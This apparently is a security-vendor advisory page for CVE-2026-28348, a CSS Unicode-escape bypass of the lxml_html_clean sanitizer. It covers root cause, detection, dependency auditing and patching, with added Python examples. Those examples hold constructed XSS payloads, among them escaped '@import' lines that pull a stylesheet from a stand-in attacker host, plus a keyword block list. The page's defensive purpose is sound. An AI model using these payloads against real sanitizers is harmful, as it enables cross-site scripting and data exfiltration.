SentinelOne CVE Vulnerability Database

CVE-2026-28348: lxml_html_clean XSS Vulnerability

CVE-2026-28348 is an XSS vulnerability in lxml_html_clean that allows CSS Unicode escape sequences to bypass filters, enabling external CSS loading or XSS attacks. This article covers technical details, affected versions, and mitigation.

Published: March 6, 2026

CVE-2026-28348 Overview

CVE-2026-28348 is a Cross-Site Scripting (XSS) and CSS injection vulnerability in lxml_html_clean, the Python package that carries the HTML cleaning functionality originally shipped as lxml.html.clean. Prior to version 0.4.4, the _has_sneaky_javascript() method strips backslashes from style content before checking it for dangerous CSS keywords. Because browsers decode CSS Unicode escape sequences rather than discarding them, an attacker can spell @import or expression() with escapes that the filter fails to recognize, enabling loading of external stylesheets in any browser or script execution via expression() in legacy Internet Explorer.

Critical Impact

Attackers can bypass HTML sanitization filters using CSS Unicode escape sequences, potentially leading to cross-site scripting attacks or loading of external malicious CSS in applications that rely on lxml_html_clean for input sanitization.

Affected Products

  • lxml_html_clean versions prior to 0.4.4
  • Applications using lxml_html_clean for HTML sanitization
  • Python web applications relying on lxml.html.clean functionality

Discovery Timeline

  • 2026-03-05 - CVE-2026-28348 published to NVD
  • 2026-03-05 - Last updated in the NVD database

Technical Details for CVE-2026-28348

Vulnerability Analysis

The vulnerability resides in the _has_sneaky_javascript() method within lxml_html_clean, which is responsible for detecting and filtering potentially dangerous JavaScript patterns in CSS. The method's implementation contains a flaw in how it processes CSS content before performing security checks.

When processing CSS input, the method strips backslash characters before evaluating the content against a list of dangerous keywords such as @import and expression(). This preprocessing step inadvertently enables attackers to craft CSS payloads using Unicode escape sequences that evade detection.

A CSS escape sequence is a backslash followed by one to six hexadecimal digits, optionally terminated by a single whitespace character: \40, \0040 and \000040 followed by a space all decode to @. By writing one or more characters of a dangerous keyword this way, an attacker constructs a payload that looks benign to the filter but is valid CSS to the browser. The filter deletes the backslash and compares 40import against @import, which never matches, while the browser decodes \40import to @import.

For example, the @import directive could be obfuscated using Unicode escapes, allowing an attacker to load external stylesheets from attacker-controlled domains. Similarly, the expression() function, which is supported in older versions of Internet Explorer, could be encoded to execute arbitrary JavaScript within style attributes.

Root Cause

The root cause is classified as improper encoding or escaping of output (CWE-116) in the CSS filtering logic. The _has_sneaky_javascript() method deletes backslashes from the style content before checking it for dangerous patterns, whereas the browser's CSS parser decodes the escape sequences those backslashes introduce. The sanitizer therefore inspects a different string from the one the browser will interpret, a classic filter bypass: a correct check must normalize the CSS the same way its consumer does, by decoding the escapes rather than discarding their marker.

Attack Vector

Exploitation requires user interaction: a victim must view sanitized content that contains the malicious CSS payload. The payload can be delivered through any input that the application passes through lxml_html_clean, such as user-generated content, comment fields, or any other HTML that undergoes sanitization. When the sanitized output is rendered, the browser decodes the CSS escape sequences and applies the directives the filter failed to recognize.

The vulnerability specifically targets:

  • External CSS loading via obfuscated @import statements, which can be used for data exfiltration or content injection
  • XSS execution via the expression() function in legacy Internet Explorer browsers

The attack is network-based, requiring no privileges on the target system, but does require user interaction to trigger. The scope is changed, meaning successful exploitation can impact resources beyond the vulnerable component.

Detection Methods for CVE-2026-28348

Indicators of Compromise

  • CSS content containing unusual Unicode escape sequences, particularly patterns like \0040import or \0065xpression
  • Web application logs showing style attributes or CSS blocks with multiple backslash-escaped characters
  • Requests to external stylesheets from unexpected or unknown domains referenced in user-generated content
  • Browser console errors related to blocked CSS resources when Content Security Policy is enforced

Detection Strategies

  • Implement input validation rules to detect CSS content with Unicode escape sequences in style-related contexts
  • Monitor for anomalous CSS patterns in user-submitted content, particularly escape sequences near CSS function calls or directives
  • Deploy web application firewall (WAF) rules to flag CSS content containing obfuscated @import or expression() patterns
  • Review application dependencies to identify usage of lxml_html_clean versions prior to 0.4.4
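The following Python example is added here and is not part of the advisory or of lxml_html_clean. It shows one way to implement the detection rules above for log search, stored-content audits or a WAF rule set: it generates a regular expression that matches a CSS keyword in every spelling a CSS tokenizer would accept (each character either literal or written as a one-to-six-digit hex escape with an optional trailing whitespace), then scans style attributes and <style> blocks in a set of constructed sample records for @import and expression(. The record contents and the attacker.example host are constructed for the demonstration.

```python
import re

# Added example for the detection rules on this page; not SentinelOne's or
# lxml_html_clean's code. It builds regexes that match @import / expression(
# in any spelling a CSS tokenizer accepts, for searching logs, stored content
# or WAF rule sets. Sample records below are constructed for the demo.


def _char_alternatives(ch: str) -> str:
    """Regex fragment matching `ch` literally or as a CSS escape.

    A CSS hex escape is '\\' plus one to six hex digits, optionally followed by
    one whitespace, so '@' (U+0040) can be written \\40, \\0040 or \\000040.
    Non-hex characters can also be escaped as themselves ('\\i' is 'i'); hex
    letters such as 'e' cannot, because '\\e' would be U+000E.
    """
    code = f"{ord(ch.lower()):x}"
    parts = [rf"\\0{{0,{6 - len(code)}}}{code}[ \t\r\n\f]?", re.escape(ch)]
    if ch.lower() not in "0123456789abcdef":
        parts.append(r"\\" + re.escape(ch))
    return "(?:" + "|".join(parts) + ")"


def escaped_keyword_pattern(keyword: str):
    """Case-insensitive regex matching `keyword` with any mix of literal and
    escaped characters, e.g. '\\40import', '@\\69mport', '\\000040 IMPORT'."""
    return re.compile("".join(_char_alternatives(c) for c in keyword), re.I)


# The two directives the advisory names (the filter's own list is longer)
DANGEROUS_CSS = {
    "import": escaped_keyword_pattern("@import"),
    "expression": escaped_keyword_pattern("expression("),
}

# style="..." / style='...' attribute values and <style> element bodies
_STYLE_CONTEXTS = re.compile(
    r"""style\s*=\s*(?:"([^"]*)"|'([^']*)')|<style\b[^>]*>(.*?)</style>""",
    re.I | re.S,
)


def find_obfuscated_css(html: str) -> list:
    """Return (rule, matched_text) for each dangerous keyword, plain or
    escaped, found inside a style context of `html`."""
    hits = []
    for ctx in _STYLE_CONTEXTS.finditer(html):
        css = next(g for g in ctx.groups() if g is not None)
        for rule, pattern in DANGEROUS_CSS.items():
            hits.extend((rule, m.group(0)) for m in pattern.finditer(css))
    return hits


# Constructed stored-content records (id, html); attacker.example is hypothetical
SAMPLE_RECORDS = [
    ("post-1", '<p style="color: red">hello</p>'),
    ("post-2", r"<div style='background:url(x);\40import url(https://attacker.example/s.css)'>x</div>"),
    ("post-3", r'<span style="width: \0065xpression(alert(1))">y</span>'),
    ("post-4", r"<style>@\69mport url(https://attacker.example/t.css);</style>"),
    ("post-5", r"<p style='font-family: \41rial'>z</p>"),  # escape, but no keyword
]


def scan_records(records=SAMPLE_RECORDS) -> dict:
    """Map record id to its hits, omitting clean records."""
    result = {}
    for rid, html in records:
        hits = find_obfuscated_css(html)
        if hits:
            result[rid] = hits
    return result


if __name__ == "__main__":
    for rid, hits in scan_records().items():
        print(rid, hits)
```

The generated pattern deliberately over-matches: it accepts \72e as "re" although a CSS tokenizer would read it as U+072E, and it ignores comments between characters. That trade-off suits detection, where a false positive costs a review and a miss costs a bypass. For sanitizing, the check must decode the escapes and then compare, not pattern-match the raw text.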

Monitoring Recommendations

  • Enable verbose logging for HTML sanitization operations to capture potentially malicious input attempts
  • Configure Content Security Policy (CSP) headers with style-src directives to restrict external stylesheet loading
  • Implement real-time monitoring for outbound connections to unknown domains that could indicate CSS-based data exfiltration
  • Set up dependency vulnerability scanning to alert on outdated lxml_html_clean versions in your software supply chain
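An added example, not from the advisory or the project, for the dependency checks listed above: it parses requirement lines for pins of lxml_html_clean below 0.4.4, flags lower bounds that still admit vulnerable releases, notes that the lxml[html_clean] extra pulls the package in transitively, and reports the installed version via importlib.metadata. The requirements text is constructed, and the version parser compares only the numeric prefix of a version string.

```python
import re
from importlib import metadata

# Added example, not from the advisory or the lxml_html_clean project: audits
# requirement pins and the installed distribution for lxml_html_clean < 0.4.4.

FIXED_VERSION = (0, 4, 4)

# Matches the package under either spelling, and the lxml extra that pulls it in
_REQ_LINE = re.compile(
    r"^\s*(lxml[-_]html[-_]clean|lxml\[html_clean\])(?![\w-])\s*([<>=!~]=?)?\s*([\w.\-+]+)?",
    re.I,
)


def parse_version(text: str) -> tuple:
    """'0.4.3' -> (0, 4, 3). Only the leading dotted-numeric part is compared;
    pre-release suffixes such as 'rc1' are ignored (deliberately conservative)."""
    m = re.match(r"(\d+(?:\.\d+)*)", text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else ()


def audit_requirements(text: str) -> list:
    """Return (line_number, message) for each requirement line that may
    resolve to a vulnerable lxml_html_clean."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        m = _REQ_LINE.match(raw.split("#", 1)[0])
        if not m:
            continue
        name, op, ver = m.groups()
        if name.lower().startswith("lxml["):
            findings.append((lineno, f"{name}: the html_clean extra installs "
                             "lxml_html_clean transitively; check the resolved version in the lock file"))
        elif op is None:
            findings.append((lineno, f"{name}: unpinned; any version may be installed"))
        else:
            pinned = parse_version(ver or "")
            if op == "==":
                if pinned < FIXED_VERSION:
                    findings.append((lineno, f"{name}=={ver}: vulnerable, require >=0.4.4"))
            elif op in (">=", "~="):
                if pinned < FIXED_VERSION:
                    findings.append((lineno, f"{name}{op}{ver}: lower bound admits vulnerable releases"))
            else:
                findings.append((lineno, f"{name}{op}{ver}: specifier sets no floor of >=0.4.4"))
    return findings


def installed_version_status():
    """Return (version, is_vulnerable) for the installed distribution, or
    (None, None) when lxml_html_clean is not installed in this interpreter."""
    try:
        ver = metadata.version("lxml_html_clean")
    except metadata.PackageNotFoundError:
        return (None, None)
    return (ver, parse_version(ver) < FIXED_VERSION)


# Constructed requirements text for the demonstration
SAMPLE_REQUIREMENTS = """\
lxml[html_clean]>=5.2          # extra pulls in lxml_html_clean
lxml_html_clean==0.4.1         # vulnerable pin
lxml-html-clean>=0.4.0         # floor admits vulnerable releases
lxml_html_clean==0.4.4         # fixed
Django==5.0
"""

if __name__ == "__main__":
    for lineno, msg in audit_requirements(SAMPLE_REQUIREMENTS):
        print(f"line {lineno}: {msg}")
    print("installed:", installed_version_status())
```

Run the audit against every requirements and constraints file in the repository, not only the top-level one, and remember that pip show and importlib.metadata report only the environment they run in; a lock file is the authoritative record of what a deployment actually resolves.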

How to Mitigate CVE-2026-28348

Immediate Actions Required

  • Upgrade lxml_html_clean to version 0.4.4 or later immediately
  • Review and audit all user-generated content that may have been processed by vulnerable versions
  • Implement Content Security Policy headers to restrict inline styles and external stylesheet sources as a defense-in-depth measure
  • Consider adding secondary validation for CSS content in security-critical applications

Patch Information

The vulnerability has been patched in lxml_html_clean version 0.4.4. The fix addresses the backslash stripping behavior in the _has_sneaky_javascript() method to properly handle CSS Unicode escape sequences before security filtering.

For detailed information about the fix, refer to the GitHub Security Advisory and the commit implementing the patch.

Workarounds

  • Implement additional CSS validation logic at the application layer that decodes Unicode escape sequences before filtering
  • Use Content Security Policy headers with strict style-src directives to block external CSS and inline styles where feasible
  • Disable or filter the expression() function and @import directive at the application level as an additional layer of defense
  • Consider using alternative HTML sanitization libraries that properly handle CSS Unicode escape sequences if upgrading is not immediately possible
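An added example, not lxml_html_clean's own code, that illustrates the root cause described earlier and the first workaround in the list above. A simplified model of the pre-0.4.4 check (backslashes stripped before keyword matching) is compared with a check that first decodes CSS escapes the way a browser's tokenizer does (CSS Syntax Level 3: one to six hex digits, one optional terminating whitespace, invalid code points mapped to U+FFFD). The payloads and the attacker.example host are constructed; the keyword list is limited to the patterns this page discusses.

```python
import re

# Added example, not lxml_html_clean's own code. vulnerable_has_sneaky_css is a
# simplified model of the pre-0.4.4 behaviour the advisory describes (backslashes
# deleted before keyword matching); hardened_has_sneaky_css decodes escapes first.

_HEX = set("0123456789abcdefABCDEF")
_CSS_WS = " \t\n\r\f"
_COMMENTS = re.compile(r"/\*.*?\*/", re.S)
_WHITESPACE = re.compile(r"[\s\x00-\x08\x0b\x0c\x0e-\x1f]+")
# Keywords rejected in style content, as discussed on this page
_DANGEROUS = ("@import", "expression(", "javascript:", "vbscript:")


def decode_css_escapes(css: str) -> str:
    """Resolve backslash escapes the way a CSS tokenizer does (CSS Syntax
    Level 3): '\\' + 1..6 hex digits, plus one optional trailing whitespace,
    becomes that code point; '\\' + any other character becomes that character;
    a lone trailing '\\' is dropped."""
    out = []
    i, n = 0, len(css)
    while i < n:
        if css[i] != "\\":
            out.append(css[i])
            i += 1
            continue
        i += 1                                  # skip the backslash
        if i >= n:
            break                               # trailing backslash escapes nothing
        j = i
        while j < n and j - i < 6 and css[j] in _HEX:
            j += 1
        if j == i:                              # non-hex character: taken literally
            out.append(css[i])
            i += 1
            continue
        cp = int(css[i:j], 16)
        if cp == 0 or 0xD800 <= cp <= 0xDFFF or cp > 0x10FFFF:
            cp = 0xFFFD                         # invalid code points become U+FFFD
        out.append(chr(cp))
        i = j
        if i < n and css[i] in _CSS_WS:         # one whitespace terminates the escape
            if css[i] == "\r" and i + 1 < n and css[i + 1] == "\n":
                i += 1                          # CRLF counts as a single whitespace
            i += 1
    return "".join(out)


def _normalize(style: str, resolve_escapes) -> str:
    style = _COMMENTS.sub("", style)
    style = resolve_escapes(style)
    style = _WHITESPACE.sub("", style)
    return style.lower()


def vulnerable_has_sneaky_css(style: str) -> bool:
    """Model of the flawed check: backslashes are deleted, so r'\\40import'
    is compared as '40import' and never matches '@import'."""
    normalized = _normalize(style, lambda s: s.replace("\\", ""))
    return any(keyword in normalized for keyword in _DANGEROUS)


def hardened_has_sneaky_css(style: str) -> bool:
    """Decode escapes the way the browser will, then match keywords."""
    normalized = _normalize(style, decode_css_escapes)
    return any(keyword in normalized for keyword in _DANGEROUS)


# Constructed payloads; attacker.example is a hypothetical host
PAYLOADS = {
    "plain":       "@import url(https://attacker.example/steal.css);",
    "escaped_at":  r"\40import url(https://attacker.example/steal.css);",
    "long_escape": r"\000040 import url(https://attacker.example/steal.css);",
    "expression":  r"width: \65xpression(alert(document.domain));",
    "benign":      "color: red; background: url(/static/logo.png);",
}


def compare(payloads=PAYLOADS) -> dict:
    """Return {name: (vulnerable_verdict, hardened_verdict)} for each payload."""
    return {name: (vulnerable_has_sneaky_css(p), hardened_has_sneaky_css(p))
            for name, p in payloads.items()}


if __name__ == "__main__":
    for name, (old, new) in compare().items():
        print(f"{name:12s} pre-0.4.4 model: {old!s:5s} decode-first: {new}")
```

The hardened check decodes before it removes whitespace, because a whitespace character immediately after a hex escape is part of the escape (\40 a is "@a", but \40a is U+040A); stripping whitespace first would change the decoded string. The same ordering matters for any secondary validation layer added in front of an unpatched sanitizer.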
```bash
# Upgrade lxml_html_clean to the patched release. Quote the specifier: unquoted,
# the shell treats ">=" as an output redirection and pip never sees the version.
pip install --upgrade 'lxml_html_clean>=0.4.4'

# Verify that the installed version is 0.4.4 or later
pip show lxml_html_clean | grep -i '^Version'
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Vulnerability Details

  • Type: XSS
  • Vendor/Tech: lxml
  • Severity: MEDIUM
  • CVSS Score: 6.1
  • Known Exploited: No
  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Impact Assessment

  • Confidentiality: Low
  • Integrity: Low
  • Availability: None

CWE References

  • CWE-116: Improper Encoding or Escaping of Output

Technical References

  • GitHub Commit Update
  • GitHub Security Advisory

Related CVEs

  • CVE-2026-28350: lxml_html_clean XSS Vulnerability
  • CVE-2020-27783: Lxml Python Library XSS Vulnerability
©2026 SentinelOne, All Rights Reserved.
